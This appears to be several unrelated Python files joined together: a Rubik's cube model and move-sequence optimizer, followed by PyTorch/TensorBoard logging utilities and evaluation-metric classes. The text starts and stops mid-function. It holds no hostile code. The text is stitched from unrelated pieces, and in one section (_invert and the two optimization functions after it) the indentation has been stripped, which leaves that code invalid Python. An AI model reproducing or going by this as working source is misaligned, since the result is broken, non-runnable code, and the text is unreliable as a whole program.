                    self.heuristic(new_combinations),
                )
                queue.append(queue_element)
                # Shortcut: return as soon as a solved child is generated
                # instead of waiting for it to be dequeued.
                if child_cube.is_solved():
                    return queue_element[1]
        raise ValueError("Invalid cube!")
from rubik import cube
# Move-translation tables for 90-degree whole-cube rotations. Each table maps
# a move to the move with the equivalent effect across the given rotation
# (used by _unrotate); moves absent from a table are unaffected.
X_ROT_CW = {
    'U': 'F',
    'B': 'U',
    'D': 'B',
    'F': 'D',
    'E': 'Si',
    'S': 'E',
    'Y': 'Z',
    'Z': 'Yi',
}
Y_ROT_CW = {
    'B': 'L',
    'R': 'B',
    'F': 'R',
    'L': 'F',
    'S': 'Mi',
    'M': 'S',
    'Z': 'X',
    'X': 'Zi'
}
Z_ROT_CW = {
    'U': 'L',
    'R': 'U',
    'D': 'R',
    'L': 'D',
    'E': 'Mi',
    'M': 'E',
    'Y': 'Xi',
    'X': 'Y',
}
# Counter-clockwise tables are the inverses of the clockwise ones.
X_ROT_CC = {v: k for k, v in X_ROT_CW.items()}
Y_ROT_CC = {v: k for k, v in Y_ROT_CW.items()}
Z_ROT_CC = {v: k for k, v in Z_ROT_CW.items()}

# Dispatch table for get_rot_table: rotation move -> translation table.
_ROT_TABLES = {
    'X': X_ROT_CW, 'Xi': X_ROT_CC,
    'Y': Y_ROT_CW, 'Yi': Y_ROT_CC,
    'Z': Z_ROT_CW, 'Zi': Z_ROT_CC,
}


def get_rot_table(rot):
    """Return the move-translation table for full-cube rotation *rot*.

    Args:
        rot: One of 'X', 'Xi', 'Y', 'Yi', 'Z', 'Zi'.

    Raises:
        ValueError: If *rot* is not a recognized rotation. (Previously an
            unknown rotation silently returned None, deferring the failure
            to a confusing TypeError in the caller.)
    """
    try:
        return _ROT_TABLES[rot]
    except KeyError:
        raise ValueError(f"unknown rotation: {rot!r}") from None
def _invert(move):
if move.endswith('i'):
return move[:1]
return move + 'i'
def apply_repeat_three_optimization(moves):
""" R, R, R --> Ri """
changed = False
i = 0
while i < len(moves) - 2:
if moves[i] == moves[i+1] == moves[i+2]:
moves[i:i+3] = [_invert(moves[i])]
changed = True
else:
i += 1
if changed:
apply_repeat_three_optimization(moves)
def apply_do_undo_optimization(moves):
""" R Ri --> <nothing>, R R Ri Ri --> <nothing> """
changed = False
i = 0
while i < len(moves) - 1:
if _invert(moves[i]) == moves[i+1]:
moves[i:i+2] = []
changed = True
else:
i += 1
if changed:
apply_do_undo_optimization(moves)
def _unrotate(rot, moves):
    """Translate *moves* across the full-cube rotation *rot* so they have
    the equivalent effect without the rotation."""
    table = get_rot_table(rot)

    def translate(move):
        # Direct hit: the move itself appears in the table.
        if move in table:
            return table[move]
        # Inverted hit: translate the base move, then re-invert the result.
        inverse = _invert(move)
        if inverse in table:
            return _invert(table[inverse])
        # Moves unaffected by this rotation pass through unchanged.
        return move

    return [translate(move) for move in moves]
def apply_no_full_cube_rotation_optimization(moves):
    """Eliminate matched full-cube rotation pairs in place.

    For each rotation move (X/Y/Z or inverse), search backwards for its
    inverse later in the sequence; if found, drop both endpoints and rewrite
    the moves between them via _unrotate so the overall effect is unchanged.
    Reruns recursively until a full pass makes no change.
    """
    rots = {'X', 'Y', 'Z', 'Xi', 'Yi', 'Zi'}
    changed = False
    i = 0
    while i < len(moves):
        if moves[i] not in rots:
            i += 1
            continue
        # Scan from the end so the outermost matching inverse is paired first.
        for j in reversed(range(i + 1, len(moves))):
            if moves[j] == _invert(moves[i]):
                # Replace rotation..inverse (inclusive) with the translated
                # interior; both rotation endpoints disappear.
                moves[i:j+1] = _unrotate(moves[i], moves[i+1:j])
                changed = True
                break
        i += 1
    if changed:
        # The rewrite may expose new removable pairs; rescan from scratch.
        apply_no_full_cube_rotation_optimization(moves)
def optimize_moves(moves):
    """Return an optimized copy of *moves*; the input is left untouched."""
    optimized = list(moves)
    # Each pass mutates the copy in place; order matters (rotations first).
    for optimization in (
        apply_no_full_cube_rotation_optimization,
        apply_repeat_three_optimization,
        apply_do_undo_optimization,
    ):
        optimization(optimized)
    return optimized
if __name__ == '__main__':
    # Demo: optimize a long recorded solve sequence and verify that the
    # optimized sequence produces the same cube state as the original.
    test_seq_1 = ("Li Li E L Ei Li B Ei R E Ri Z E L Ei Li Zi U U Ui Ui Ui B U B B B Bi "
                  "Ri B R Z U U Ui Ui Ui B U B B B Ri B B R Bi Bi D Bi Di Z Ri B B R Bi "
                  "Bi D Bi Di Z B B Bi Ri B R Z B L Bi Li Bi Di B D B Bi Di B D B L Bi Li "
                  "Z B B B Bi Di B D B L Bi Li Z B Bi Di B D B L Bi Li Z B B B L Bi Li Bi "
                  "Di B D Z X X F F D F R Fi Ri Di Xi Xi X X Li Fi L D F Di Li F L F F Zi "
                  "Li Fi L D F Di Li F L F F Z F Li Fi L D F Di Li F L F Li Fi L D F Di "
                  "Li F L F F Xi Xi X X Ri Fi R Fi Ri F F R F F F R F Ri F R F F Ri F F F "
                  "F Ri Fi R Fi Ri F F R F F F R F Ri F R F F Ri F F Xi Xi X X R R F D Ui "
                  "R R Di U F R R R R F D Ui R R Di U F R R Z Z Z Z Z Z R R F D Ui R R Di "
                  "U F R R Z Z Z Z R R F D Ui R R Di U F R R Z Z Z Z Z Ri S Ri Ri S S Ri "
                  "Fi Fi R Si Si Ri Ri Si R Fi Fi Zi Xi Xi")
    moves = test_seq_1.split()
    # BUG FIX: these two prints were plain strings missing the f-prefix, so
    # "{len(moves)}" etc. were printed literally instead of interpolated.
    print(f"{len(moves)} moves: {' '.join(moves)}")
    opt = optimize_moves(moves)
    print(f"{len(opt)} moves: {' '.join(opt)}")
    orig = cube.Cube("OOOOOOOOOYYYWWWGGGBBBYYYWWWGGGBBBYYYWWWGGGBBBRRRRRRRRR")
    c, d = cube.Cube(orig), cube.Cube(orig)
    c.sequence(" ".join(moves))
    d.sequence(" ".join(opt))
    print(c, '\n')
    print(d)
    # The optimized sequence must leave the cube in the identical state.
    assert c == d
import string
from rubik.maths import Point, Matrix
# Unit vectors naming the six face directions of the cube's x-y-z
# coordinate system (RIGHT/LEFT = ±x, UP/DOWN = ±y, FRONT/BACK = ±z).
RIGHT = X_AXIS = Point(1, 0, 0)
LEFT = Point(-1, 0, 0)
UP = Y_AXIS = Point(0, 1, 0)
DOWN = Point(0, -1, 0)
FRONT = Z_AXIS = Point(0, 0, 1)
BACK = Point(0, 0, -1)
# Piece-type tags assigned by Piece._set_piece_type().
FACE = 'face'
EDGE = 'edge'
CORNER = 'corner'
# 90 degree rotations in the XY plane. CW is clockwise, CC is counter-clockwise.
ROT_XY_CW = Matrix(0, 1, 0,
                   -1, 0, 0,
                   0, 0, 1)
ROT_XY_CC = Matrix(0, -1, 0,
                   1, 0, 0,
                   0, 0, 1)
# 90 degree rotations in the XZ plane (around the y-axis when viewed pointing toward you).
ROT_XZ_CW = Matrix(0, 0, -1,
                   0, 1, 0,
                   1, 0, 0)
ROT_XZ_CC = Matrix(0, 0, 1,
                   0, 1, 0,
                   -1, 0, 0)
# 90 degree rotations in the YZ plane (around the x-axis when viewed pointing toward you).
ROT_YZ_CW = Matrix(1, 0, 0,
                   0, 0, 1,
                   0, -1, 0)
ROT_YZ_CC = Matrix(1, 0, 0,
                   0, 0, -1,
                   0, 1, 0)
def get_rot_from_face(face):
    """
    :param face: One of FRONT, BACK, LEFT, RIGHT, UP, DOWN
    :return: A pair (CW, CC) given the clockwise and counterclockwise rotations for that face
    """
    face_rotations = ((RIGHT, ("R", "Ri")),
                      (LEFT, ("L", "Li")),
                      (UP, ("U", "Ui")),
                      (DOWN, ("D", "Di")),
                      (FRONT, ("F", "Fi")),
                      (BACK, ("B", "Bi")))
    for axis, rotations in face_rotations:
        if face == axis:
            return rotations
    return None
class Piece:
    """A single cubie: its position on the cube and the colors of its stickers."""
    def __init__(self, pos, colors):
        """
        :param pos: A tuple of integers (x, y, z) each ranging from -1 to 1
        :param colors: A tuple of length three (x, y, z) where each component gives the color
                       of the side of the piece on that axis (if it exists), or None.
        """
        assert all(type(x) == int and x in (-1, 0, 1) for x in pos)
        assert len(colors) == 3
        self.pos = pos
        # Stored as a list so rotate() can swap entries in place.
        self.colors = list(colors)
        self._set_piece_type()
    def __str__(self):
        colors = "".join(c for c in self.colors if c is not None)
        return f"({self.type}, {colors}, {self.pos})"
    def _set_piece_type(self):
        # Piece type follows from the number of stickers: 1 = face center,
        # 2 = edge, 3 = corner.
        if self.colors.count(None) == 2:
            self.type = FACE
        elif self.colors.count(None) == 1:
            self.type = EDGE
        elif self.colors.count(None) == 0:
            self.type = CORNER
        else:
            raise ValueError(f"Must have 1, 2, or 3 colors - given colors={self.colors}")
    def rotate(self, matrix):
        """Apply the given rotation matrix to this piece."""
        before = self.pos
        self.pos = matrix * self.pos
        # we need to swap the positions of two things in self.colors so colors appear
        # on the correct faces. rot gives us the axes to swap between.
        rot = self.pos - before
        if not any(rot):
            return  # no change occurred
        if rot.count(0) == 2:
            # 180-degree turn: apply the rotation to `rot` itself to recover
            # both axes involved in the swap.
            rot += matrix * rot
        assert rot.count(0) == 1, (
            f"There is a bug in the Piece.rotate() method!"
            f"\nbefore: {before}"
            f"\nself.pos: {self.pos}"
            f"\nrot: {rot}"
        )
        # Swap the sticker colors of the two axes that changed.
        i, j = (i for i, x in enumerate(rot) if x != 0)
        self.colors[i], self.colors[j] = self.colors[j], self.colors[i]
class Cube:
    """Stores Pieces which are addressed through an x-y-z coordinate system:
        -x is the LEFT direction, +x is the RIGHT direction
        -y is the DOWN direction, +y is the UP direction
        -z is the BACK direction, +z is the FRONT direction
    """
    def _from_cube(self, c):
        # Copy constructor helper: deep-copy every Piece of cube `c`.
        self.faces = [Piece(pos=Point(p.pos), colors=p.colors) for p in c.faces]
        self.edges = [Piece(pos=Point(p.pos), colors=p.colors) for p in c.edges]
        self.corners = [Piece(pos=Point(p.pos), colors=p.colors) for p in c.corners]
        self.pieces = self.faces + self.edges + self.corners
    def _assert_data(self):
        # Sanity check: 6 face centers + 12 edges + 8 corners = 26 pieces.
        assert len(self.pieces) == 26
        assert all(p.type == FACE for p in self.faces)
        assert all(p.type == EDGE for p in self.edges)
        assert all(p.type == CORNER for p in self.corners)
    def __init__(self, cube_str):
        """
        Build a cube from a 54-character sticker string (whitespace ignored),
        or deep-copy another Cube instance.

        cube_str is the unfolded cube, indexed like:
               UUU                0  1  2
               UUU                3  4  5
               UUU                6  7  8
           LLL FFF RRR BBB        9 10 11 12 13 14 15 16 17 18 19 20
           LLL FFF RRR BBB       21 22 23 24 25 26 27 28 29 30 31 32
           LLL FFF RRR BBB       33 34 35 36 37 38 39 40 41 42 43 44
               DDD               45 46 47
               DDD               48 49 50
               DDD               51 52 53
        Note that the back side is mirrored in the horizontal axis during unfolding.
        Each 'sticker' must be a single character.
        """
        if isinstance(cube_str, Cube):
            self._from_cube(cube_str)
            return
        cube_str = "".join(x for x in cube_str if x not in string.whitespace)
        assert len(cube_str) == 54
        self.faces = (
            Piece(pos=RIGHT, colors=(cube_str[28], None, None)),
            Piece(pos=LEFT, colors=(cube_str[22], None, None)),
            Piece(pos=UP, colors=(None, cube_str[4], None)),
            Piece(pos=DOWN, colors=(None, cube_str[49], None)),
            Piece(pos=FRONT, colors=(None, None, cube_str[25])),
            Piece(pos=BACK, colors=(None, None, cube_str[31])))
        self.edges = (
            Piece(pos=RIGHT + UP, colors=(cube_str[16], cube_str[5], None)),
            Piece(pos=RIGHT + DOWN, colors=(cube_str[40], cube_str[50], None)),
            Piece(pos=RIGHT + FRONT, colors=(cube_str[27], None, cube_str[26])),
            Piece(pos=RIGHT + BACK, colors=(cube_str[29], None, cube_str[30])),
            Piece(pos=LEFT + UP, colors=(cube_str[10], cube_str[3], None)),
            Piece(pos=LEFT + DOWN, colors=(cube_str[34], cube_str[48], None)),
            Piece(pos=LEFT + FRONT, colors=(cube_str[23], None, cube_str[24])),
            Piece(pos=LEFT + BACK, colors=(cube_str[21], None, cube_str[32])),
            Piece(pos=UP + FRONT, colors=(None, cube_str[7], cube_str[13])),
            Piece(pos=UP + BACK, colors=(None, cube_str[1], cube_str[19])),
            Piece(pos=DOWN + FRONT, colors=(None, cube_str[46], cube_str[37])),
            Piece(pos=DOWN + BACK, colors=(None, cube_str[52], cube_str[43])),
        )
        self.corners = (
            Piece(pos=RIGHT + UP + FRONT, colors=(cube_str[15], cube_str[8], cube_str[14])),
            Piece(pos=RIGHT + UP + BACK, colors=(cube_str[17], cube_str[2], cube_str[18])),
            Piece(pos=RIGHT + DOWN + FRONT, colors=(cube_str[39], cube_str[47], cube_str[38])),
            Piece(pos=RIGHT + DOWN + BACK, colors=(cube_str[41], cube_str[53], cube_str[42])),
            Piece(pos=LEFT + UP + FRONT, colors=(cube_str[11], cube_str[6], cube_str[12])),
            Piece(pos=LEFT + UP + BACK, colors=(cube_str[9], cube_str[0], cube_str[20])),
            Piece(pos=LEFT + DOWN + FRONT, colors=(cube_str[35], cube_str[45], cube_str[36])),
            Piece(pos=LEFT + DOWN + BACK, colors=(cube_str[33], cube_str[51], cube_str[44])),
        )
        self.pieces = self.faces + self.edges + self.corners
        self._assert_data()
    def is_solved(self):
        """Return True when every face is a single uniform color."""
        def check(colors):
            assert len(colors) == 9
            return all(c == colors[0] for c in colors)
        return (check([piece.colors[2] for piece in self._face(FRONT)]) and
                check([piece.colors[2] for piece in self._face(BACK)]) and
                check([piece.colors[1] for piece in self._face(UP)]) and
                check([piece.colors[1] for piece in self._face(DOWN)]) and
                check([piece.colors[0] for piece in self._face(LEFT)]) and
                check([piece.colors[0] for piece in self._face(RIGHT)]))
    def _face(self, axis):
        """
        :param axis: One of LEFT, RIGHT, UP, DOWN, FRONT, BACK
        :return: A list of Pieces on the given face
        """
        assert axis.count(0) == 2
        return [p for p in self.pieces if p.pos.dot(axis) > 0]
    def _slice(self, plane):
        """
        :param plane: A sum of any two of X_AXIS, Y_AXIS, Z_AXIS (e.g. X_AXIS + Y_AXIS)
        :return: A list of Pieces in the given plane
        """
        assert plane.count(0) == 1
        i = next((i for i, x in enumerate(plane) if x == 0))
        return [p for p in self.pieces if p.pos[i] == 0]
    def _rotate_face(self, face, matrix):
        self._rotate_pieces(self._face(face), matrix)
    def _rotate_slice(self, plane, matrix):
        self._rotate_pieces(self._slice(plane), matrix)
    def _rotate_pieces(self, pieces, matrix):
        for piece in pieces:
            piece.rotate(matrix)
    # Rubik's Cube Notation: http://ruwix.com/the-rubiks-cube/notation/
    # Face turns (suffix `i` means inverse/counterclockwise).
    def L(self): self._rotate_face(LEFT, ROT_YZ_CC)
    def Li(self): self._rotate_face(LEFT, ROT_YZ_CW)
    def R(self): self._rotate_face(RIGHT, ROT_YZ_CW)
    def Ri(self): self._rotate_face(RIGHT, ROT_YZ_CC)
    def U(self): self._rotate_face(UP, ROT_XZ_CW)
    def Ui(self): self._rotate_face(UP, ROT_XZ_CC)
    def D(self): self._rotate_face(DOWN, ROT_XZ_CC)
    def Di(self): self._rotate_face(DOWN, ROT_XZ_CW)
    def F(self): self._rotate_face(FRONT, ROT_XY_CW)
    def Fi(self): self._rotate_face(FRONT, ROT_XY_CC)
    def B(self): self._rotate_face(BACK, ROT_XY_CC)
    def Bi(self): self._rotate_face(BACK, ROT_XY_CW)
    # Slice turns.
    def M(self): self._rotate_slice(Y_AXIS + Z_AXIS, ROT_YZ_CC)
    def Mi(self): self._rotate_slice(Y_AXIS + Z_AXIS, ROT_YZ_CW)
    def E(self): self._rotate_slice(X_AXIS + Z_AXIS, ROT_XZ_CC)
    def Ei(self): self._rotate_slice(X_AXIS + Z_AXIS, ROT_XZ_CW)
    def S(self): self._rotate_slice(X_AXIS + Y_AXIS, ROT_XY_CW)
    def Si(self): self._rotate_slice(X_AXIS + Y_AXIS, ROT_XY_CC)
    # Whole-cube rotations.
    def X(self): self._rotate_pieces(self.pieces, ROT_YZ_CW)
    def Xi(self): self._rotate_pieces(self.pieces, ROT_YZ_CC)
    def Y(self): self._rotate_pieces(self.pieces, ROT_XZ_CW)
    def Yi(self): self._rotate_pieces(self.pieces, ROT_XZ_CC)
    def Z(self): self._rotate_pieces(self.pieces, ROT_XY_CW)
    def Zi(self): self._rotate_pieces(self.pieces, ROT_XY_CC)
    def sequence(self, move_str):
        """
        :param move_str: A string containing notated moves separated by spaces: "L Ri U M Ui B M"
        """
        moves = [getattr(self, name) for name in move_str.split()]
        for move in moves:
            move()
    def find_piece(self, *colors):
        """Return the Piece whose stickers are exactly *colors* (in any order), or None."""
        if None in colors:
            return
        for p in self.pieces:
            if p.colors.count(None) == 3 - len(colors) \
                    and all(c in p.colors for c in colors):
                return p
    def get_piece(self, x, y, z):
        """
        :return: the Piece at the given Point
        """
        point = Point(x, y, z)
        for p in self.pieces:
            if p.pos == point:
                return p
    def __getitem__(self, *args):
        # Supports both cube[x, y, z] (single tuple arg) and cube[point].
        if len(args) == 1:
            return self.get_piece(*args[0])
        return self.get_piece(*args)
    def __eq__(self, other):
        return isinstance(other, Cube) and self._color_list() == other._color_list()
    def __ne__(self, other):
        return not (self == other)
    def colors(self):
        """
        :return: A set containing the colors of all stickers on the cube
        """
        return set(c for piece in self.pieces for c in piece.colors if c is not None)
    # Colors of the six face centers (which never move relative to each other).
    def left_color(self): return self[LEFT].colors[0]
    def right_color(self): return self[RIGHT].colors[0]
    def up_color(self): return self[UP].colors[1]
    def down_color(self): return self[DOWN].colors[1]
    def front_color(self): return self[FRONT].colors[2]
    def back_color(self): return self[BACK].colors[2]
    def _color_list(self):
        # Serialize sticker colors in the unfolded-cube order used by
        # __init__ and __str__: up, then the three left/front/right/back
        # rows, then down.
        right = [p.colors[0] for p in sorted(self._face(RIGHT), key=lambda p: (-p.pos.y, -p.pos.z))]
        left = [p.colors[0] for p in sorted(self._face(LEFT), key=lambda p: (-p.pos.y, p.pos.z))]
        up = [p.colors[1] for p in sorted(self._face(UP), key=lambda p: (p.pos.z, p.pos.x))]
        down = [p.colors[1] for p in sorted(self._face(DOWN), key=lambda p: (-p.pos.z, p.pos.x))]
        front = [p.colors[2] for p in sorted(self._face(FRONT), key=lambda p: (-p.pos.y, p.pos.x))]
        back = [p.colors[2] for p in sorted(self._face(BACK), key=lambda p: (-p.pos.y, -p.pos.x))]
        return (up + left[0:3] + front[0:3] + right[0:3] + back[0:3]
                + left[3:6] + front[3:6] + right[3:6] + back[3:6]
                + left[6:9] + front[6:9] + right[6:9] + back[6:9] + down)
    def flat_str(self):
        """Return the 54-character sticker string with no whitespace."""
        return "".join(x for x in str(self) if x not in string.whitespace)
    def __str__(self):
        template = ("    {}{}{}\n"
                    "    {}{}{}\n"
                    "    {}{}{}\n"
                    "{}{}{} {}{}{} {}{}{} {}{}{}\n"
                    "{}{}{} {}{}{} {}{}{} {}{}{}\n"
                    "{}{}{} {}{}{} {}{}{} {}{}{}\n"
                    "    {}{}{}\n"
                    "    {}{}{}\n"
                    "    {}{}{}")
        return "    " + template.format(*self._color_list()).strip()
if __name__ == '__main__':
    # Demo: parse an unfolded cube layout and print it back out.
    layout = (" DLU\n"
              " RRD\n"
              " FFU\n"
              "BBL DDR BRB LDL\n"
              "RBF RUU LFB DDU\n"
              "FBR BBR FUD FLU\n"
              " DLU\n"
              " ULF\n"
              " LFR")
    cube = Cube(layout)
    print(cube)
import os
import csv
import torch
from PIL import Image
from torchvision.utils import make_grid, save_image
from torch.utils.tensorboard import SummaryWriter
try:
    from torch.utils.tensorboard.summary import hparams
except ImportError:
    # Older torch versions don't ship `hparams`; fall back to a stub returning
    # dummy summaries so hparam logging degrades instead of crashing.
    # (Was a bare `except:`, which would also swallow unrelated errors such as
    # KeyboardInterrupt.)
    hparams = lambda x, y: (0, 0, 0)
# Epoch for message logging and iteration for value logging
class Logger():
    """Composite logger that fans every event out to CLI, file and TensorBoard loggers."""
    def __init__(self, config, cli_log = True, f_log = True, tb_log = True):
        ''' CLI, file and tensorboard logger '''
        self.cli = CLILogger(cli_log)
        self.f = FileLogger(config['data']['run_dir'], f_log)
        self.tb = TensorBoardLogger(config['data']['run_dir'], tb_log)
        self.loggers = [self.f, self.tb, self.cli]
    def log_images(self, img_name, images):
        # Tensors with more than 3 channels can't be rendered as RGB;
        # collapse them to a single channel by summing.
        if images.shape[1] > 3:
            images = images.sum(dim = 1, keepdim = True)
        for logger in self.loggers:
            logger.log_images(img_name, images)
    def log_message(self, message, epoch):
        for logger in self.loggers:
            logger.log_message(message, epoch)
    def log_value(self, value_name, value, iteration, epoch):
        for logger in self.loggers:
            logger.log_value(value_name, value, iteration, epoch)
    def log_hparams(self, hparam, metrics):
        for logger in self.loggers:
            logger.log_hparams(hparam, metrics)
    def log_graph(self, model, data):
        # Model graphs only make sense in TensorBoard.
        self.tb.log_graph(model, data)
    # Extra layer has to have string name of the layer
    def log_grad(self, model, iteration, num_layer = 3, extra_layers = []):
        """Log gradient histograms for a subset of the model's layers."""
        selected_layers = self.select_layers(model, num_layer, extra_layers)
        for name, parameters in model.named_parameters():
            # Parameter names look like "<layer>.<param>"; match on the layer part.
            true_name = name.split('.')[0]
            if true_name in selected_layers:
                self.tb.log_grad(name, parameters.grad, iteration)
    def select_layers(self, model, num_layer, extra_layers):
        """Pick `num_layer` roughly evenly spaced top-level layers plus the
        last layer and any `extra_layers`.

        NOTE(review): num_layer == 1 would divide by zero below — callers
        appear to always use the default of 3; confirm before changing.
        """
        all_layers = []
        for name, _ in model.named_parameters():
            true_name = name.split('.')[0]
            if true_name not in all_layers: all_layers.append(true_name)
        # Select layers according to layers
        selected_layers = []
        for i in range(num_layer - 1):
            factor = int(len(all_layers) / (num_layer - 1))
            selected_layers.append(all_layers[i * factor])
        selected_layers.append(all_layers[-1])
        selected_layers.extend(extra_layers)
        return selected_layers
    def close(self):
        self.tb.close()
class CLILogger():
    """Logger that echoes events to stdout; a no-op when disabled."""
    def __init__(self, enable = True):
        self.disable = not enable
    def log_images(self, img_name, images):
        if not self.disable:
            print('Image {}.png is saved.'.format(img_name))
    def log_message(self, message, epoch):
        if not self.disable:
            print('epoch: {}, msg: {}'.format(epoch, message))
    def log_value(self, value_name, value, iteration, epoch):
        if not self.disable:
            print('ep: {}, iter: {}, {}: {}'.format(epoch, iteration,
                                                    value_name, value))
    def log_hparams(self, hparam, metrics):
        if not self.disable:
            # Merge metrics into the hyperparameter dict before printing.
            if metrics is not None:
                hparam.update(metrics)
            print('Hyperparameter: \n {}'.format(hparam))
class FileLogger():
    """Logger writing metrics to CSV, messages to a text log and images to disk."""
    def __init__(self, log_dir, enable = True):
        self.disable = not enable
        # Accumulated rows for metrics.csv; one dict per (epoch, iteration).
        self.metrics_dicts = []
        self.metrics_column = ['epoch', 'iteration'] # Avoid repetitive add
        self.metrics_file = self.init_file('metrics.csv', log_dir)
        self.message_file = self.init_file('log.txt', log_dir)
        self.hparam_file = self.init_file('hparam.csv', log_dir)
        self.data_dir = self.init_dir('data', log_dir)
    def init_file(self, file_name, save_dir):
        """Return the path for a log file, refusing to overwrite an existing one."""
        if self.disable: return
        file_dir = '{}/{}'.format(save_dir, file_name)
        if os.path.exists(file_dir):
            raise Exception('File {} exists!'.format(file_dir))
        return file_dir
    def init_dir(self, dir_name, save_dir):
        """Create and return a fresh subdirectory; refuses to reuse an existing one."""
        if self.disable: return
        sub_dir = '{}/{}'.format(save_dir, dir_name)
        if os.path.exists(sub_dir):
            raise Exception('Path {} exists!'.format(sub_dir))
        else:
            os.mkdir(sub_dir)
        return sub_dir
    def log_images(self, img_name, images):
        if self.disable: return
        img_grid = make_grid(images)
        save_image(img_grid, '{}/{}.png'.format(self.data_dir, img_name))
    def log_message(self, message, epoch):
        if self.disable: return
        with open(self.message_file, 'a') as f:
            f.write('epoch: {} | {}\n'.format(epoch, message))
    def log_value(self, value_name, value, iteration, epoch):
        # Accumulate the value under the current iteration's row, then rewrite
        # the whole CSV (opened in 'w' mode) so the file is always complete.
        if self.disable: return
        m_dicts = self.metrics_dicts
        if len(m_dicts) == 0 or m_dicts[-1]['iteration'] != iteration:
            # First value for this iteration: start a new row.
            m_dicts.append({'epoch' : epoch,
                            'iteration' : iteration,
                            value_name : value})
        else:
            m_dicts[-1][value_name] = value
        if value_name not in self.metrics_column:
            self.metrics_column.append(value_name)
        with open(self.metrics_file, 'w') as f:
            writer = csv.DictWriter(f,
                                    fieldnames = self.metrics_column,
                                    restval = 'NaN')
            writer.writeheader()
            for data in m_dicts:
                writer.writerow(data)
    def log_hparams(self, hparam, metrics):
        # One "key,value" row per hyperparameter (metrics merged in first).
        if self.disable: return
        if not metrics is None:
            hparam.update(metrics)
        with open(self.hparam_file, 'w') as f:
            writer = csv.writer(f)
            for key, value in hparam.items():
                writer.writerow([key, value])
class TensorBoardLogger():
    """Logger forwarding events to a TensorBoard SummaryWriter."""
    def __init__(self, log_dir, enable = True):
        # NOTE(review): the writer (and its event file) is created even when
        # disabled — confirm this is intended.
        self.writer = ModSummaryWriter(log_dir)
        self.disable = not enable
    def log_images(self, img_name, images):
        if self.disable: return
        img_grid = make_grid(images)
        self.writer.add_image(img_name, img_grid)
    def log_value(self, value_name, value, iteration, epoch):
        # `epoch` is unused here; TensorBoard scalars are keyed by iteration.
        if self.disable: return
        self.writer.add_scalar(value_name, value, iteration)
    def log_message(self, message, epoch):
        if self.disable: return
        self.writer.add_text('log', message, epoch)
    def log_hparams(self, hparam, metrics):
        if self.disable: return
        self.writer.add_mod_hparams(hparam, metrics)
    def log_graph(self, model, data):
        if self.disable: return
        self.writer.add_graph(model, data)
    def log_grad(self, name, data, iteration):
        if self.disable: return
        self.writer.add_histogram(name, data, iteration)
    def close(self):
        self.writer.close()
# Custom Hparam Writer that prevent split folders
# https://github.com/pytorch/pytorch/issues/32651#issuecomment-643791116
class ModSummaryWriter(SummaryWriter):
    """SummaryWriter whose hparams logging writes into the existing run
    directory instead of creating a separate subfolder (see the linked
    GitHub issue above)."""
    def add_mod_hparams(self, hparam_dict, metric_dict):
        torch._C._log_api_usage_once("tensorboard.logging.add_hparams")
        if type(hparam_dict) is not dict or type(metric_dict) is not dict:
            raise TypeError('hparam_dict and metric_dict should be dictionary.')
        exp, ssi, sei = hparams(hparam_dict, metric_dict)
        logdir = self._get_file_writer().get_logdir()
        # Reuse this writer's own file writer rather than spawning a child
        # SummaryWriter in a subdirectory (what upstream add_hparams does).
        self.file_writer.add_summary(exp)
        self.file_writer.add_summary(ssi)
        self.file_writer.add_summary(sei)
        for k, v in metric_dict.items():
            self.add_scalar(k, v)
import numpy as np
import torch
import sklearn.metrics as sk_metrics
class Metric():
    '''
    Metrics hold values during accumulation and reduce them to stats in the
    end; be aware of memory usage when saving all scores with large
    datasets. Also holds the best metric/epoch for the run.
    '''
    def __init__(self):
        self.memory = []
        self.best_result = None
        self.best_epoch = None
    def reset_memory(self):
        self.memory = []
    def step_wrap(self, output_data):
        # Accumulate the per-batch stats produced by the subclass's step().
        stats = self.step(output_data)
        self.memory.append(stats)
    def reduce_wrap(self, config):
        # Reduce accumulated stats, track the best result, and clear memory.
        result = self.reduce(self.memory, config)
        self.update_result(result, config)
        self.reset_memory()
        return result
    def update_result(self, new, config):
        current_epoch = config['data']['current_epoch']
        old = self.best_result
        if self.best_result is None or self.select_better(old, new) == new:
            self.best_result = new
            self.best_epoch = current_epoch
    def get_best(self):
        '''
        Get the best result from current run
        Returns:
            float: best result of this metric
            int: epoch where the best result is reached
        '''
        return self.best_result, self.best_epoch
    def step(self, output_data):
        '''
        Store scores to avoid large RAM usage
        Args:
            output_data (tuple): Output from train function has form: \
                ``loss.item(), inputs, outputs, labels`` or form defined \
                by customized train function.
        Returns:
            list: an array of transformed stats for computation.
        '''
        raise NotImplementedError('Accumulation not implemented')
    def reduce(self, memory, config):
        '''
        Reduce arrays using the format in the accumulation phase
        Args:
            config (dict): Determine global progress, Metric is memoryless.
        '''
        raise NotImplementedError('Reduce not implemented')
    def select_better(self, old, new):
        '''
        Select the better metrics from two metrics
        Args:
            old (float): old metrics data
            new (float): new metrics data
        Returns:
            float: old or new metrics
        '''
        # BUG FIX: previously raised 'Reduce not implemented' (copy-paste
        # from reduce()), which misidentified the missing override.
        raise NotImplementedError('Select better not implemented')
class Loss(Metric):
    """Mean loss over an epoch; lower is better."""
    def step(self, outputs):
        # Only the scalar loss is kept; inputs/outputs/labels are dropped.
        loss = outputs[0]
        return loss
    def reduce(self, memory, config):
        return sum(memory) / len(memory)
    def select_better(self, old, new):
        return new if new < old else old
class Accuracy(Metric):
    """Classification accuracy from argmax predictions; higher is better."""
    def step(self, output_data):
        _, _, outputs, labels = output_data
        return outputs, labels
    def reduce(self, memory, config):
        preds = torch.cat([outputs for outputs, _ in memory])
        truth = torch.cat([labels for _, labels in memory])
        preds = torch.argmax(preds, dim = 1).cpu().numpy()
        truth = truth.cpu().numpy()
        return sk_metrics.accuracy_score(truth, preds)
    def select_better(self, old, new):
        return new if new > old else old
class AUC(Metric):
    """ROC AUC from softmax probabilities of the positive class; higher is better."""
    def step(self, output_data):
        _, _, outputs, labels = output_data
        return outputs, labels
    def reduce(self, memory, config):
        logits = torch.cat([outputs for outputs, _ in memory]).cpu().numpy()
        truth = torch.cat([labels for _, labels in memory]).cpu().numpy()
        # Probability of the positive class (column 1).
        probs = self.softmax(logits)[:, 1]
        return sk_metrics.roc_auc_score(truth, probs)
    def softmax(self, x):
        exps = np.exp(x)
        return exps / exps.sum(axis = 1, keepdims = True)
    def select_better(self, old, new):
        return new if new > old else old
class F1(Metric):
    """Binary F1 score from argmax predictions; higher is better."""
    def step(self, output_data):
        _, _, outputs, labels = output_data
        return outputs, labels
    def reduce(self, memory, config):
        preds = torch.cat([outputs for outputs, _ in memory])
        truth = torch.cat([labels for _, labels in memory])
        preds = torch.argmax(preds, dim = 1).cpu().numpy()
